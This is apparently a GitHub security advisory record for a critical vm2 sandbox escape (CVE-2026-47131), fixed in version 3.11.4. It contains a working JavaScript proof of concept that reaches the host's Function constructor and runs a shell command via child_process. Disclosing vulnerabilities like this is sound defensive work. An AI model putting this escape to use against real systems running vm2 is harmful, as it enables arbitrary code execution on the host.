{"id":"GHSA-v6mx-mf47-r5wg","summary":"vm2 has a Sandbox Escape issue","details":"### Summary\nBy combining `Buffer.call.call({}.__lookupGetter__, Buffer, \"__proto__\")`, `Buffer.call.call({}.__lookupSetter__, Buffer, \"__proto__\")`, and Node.js's `ERR_INVALID_ARG_TYPE` Error, the host's `TypeError` constructor can be obtained, which allows the escape from the sandbox.\nThis allows attackers to run arbitrary code.\n\n### PoC\n```js\n\"use strict\";\n\nconst { VM } = require(\"vm2\");\nconst vm = new VM();\n\nvm.run(`\n  \"use strict\";\n\n  const getProto = Buffer.call.call({}.__lookupGetter__, Buffer, \"__proto__\");\n  const setProto = Buffer.call.call({}.__lookupSetter__, Buffer, \"__proto__\");\n\n  async function f() {\n    try {\n      await WebAssembly.compileStreaming();\n    } catch(e) {\n      setProto.call(getProto.call(e), null);\n    }\n\n    try {\n      await WebAssembly.compileStreaming();\n    } catch(e) {\n      const HostFunction = e.constructor.constructor;\n      new HostFunction(\"return process\")().mainModule.require(\"child_process\").execSync(\"echo pwned\", { stdio: \"inherit\" });\n    }\n  }\n\n  f();\n`);\n```\n\n### Impact\nSandbox Escape → RCE","aliases":["CVE-2026-47131"],"modified":"2026-06-12T21:00:09.833757395Z","published":"2026-05-29T17:33:58Z","database_specific":{"nvd_published_at":"2026-06-12T15:16:27Z","cwe_ids":["CWE-913"],"severity":"CRITICAL","github_reviewed":true,"github_reviewed_at":"2026-05-29T17:33:58Z"},"references":[{"type":"WEB","url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-v6mx-mf47-r5wg"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-47131"},{"type":"WEB","url":"https://github.com/patriksimek/vm2/commit/27c525f4615e2b983f122e2bed327d810126f5c8"},{"type":"PACKAGE","url":"https://github.com/patriksimek/vm2"},{"type":"WEB","url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.4"}],"affected":[{"package":{"name":"vm2","ecosystem":"npm","purl":"pkg:npm/vm2"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"3.11.4"}]}],"database_specific":{"last_known_affected_version_range":"\u003c= 3.11.3","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-v6mx-mf47-r5wg/GHSA-v6mx-mf47-r5wg.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}]}